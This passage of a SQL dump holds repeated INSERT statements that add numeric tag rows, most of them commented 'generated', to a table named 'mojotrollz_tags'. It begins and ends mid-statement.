VALUES (11629, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11629, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11636, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11637, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11656, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11657, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11657, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11657, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11658, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11658, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11658, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11659, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11659, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11659, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11661, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11661, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11661, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11662, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11662, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11662, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11663, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11664, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11665, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11665, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11665, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11666, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11666, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11666, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11667, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11667, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11667, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11668, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11668, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11668, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11669, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11669, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11669, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11671, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11671, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11671, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11672, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11672, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11672, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11673, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11673, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11673, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11675, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11675, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11675, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11677, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11677, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11677, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11678, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11678, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11678, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11679, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11680, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11680, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11681, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11681, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11682, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11682, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11683, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11683, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11684, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11685, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11685, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11686, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11686, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11687, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11687, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11688, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11689, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11690, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11696, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11697, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11697, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11698, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11698, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11700, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11700, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11701, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11702, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11703, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11703, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11704, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11704, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11705, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11705, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11706, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11706, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11707, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11707, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11708, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11708, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11709, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11709, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11710, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11710, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11711, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11711, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11712, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11712, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11713, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11714, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11715, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11715, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11716, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11716, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11717, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11717, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11718, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11718, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11720, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11720, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11721, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11721, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11722, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11722, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11723, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11723, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11724, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11724, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11725, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11725, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11726, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11726, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11727, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11728, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11728, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11729, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11729, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11730, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11730, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11731, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11731, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11732, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11732, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11733, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11733, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11734, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11734, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11735, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11735, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11736, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11737, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11738, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11739, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11740, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11740, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11741, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11741, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11744, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11744, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11745, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11745, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11746, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11746, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11747, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11747, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11748, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11748, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11749, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11749, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11750, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11750, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11750, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11750, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11750, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11751, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11751, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11752, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11752, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11753, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11753, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11754, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11754, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11755, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11755, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11756, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11756, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11757, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11757, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11758, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11758, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11776, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11776, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11777, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11777, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11778, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11778, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11781, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11781, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11782, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11782, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11783, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11783, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11784, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11784, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11784, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11785, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11785, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11786, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11786, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11787, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11787, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11788, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11788, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11789, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11789, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11789, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11790, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11790, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11790, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11791, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11791, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11791, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11792, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11792, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11792, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11793, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11793, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11793, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11794, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11794, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11794, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11795, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11795, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11796, 1, 1, 1, 'generated'); INSERT INTO 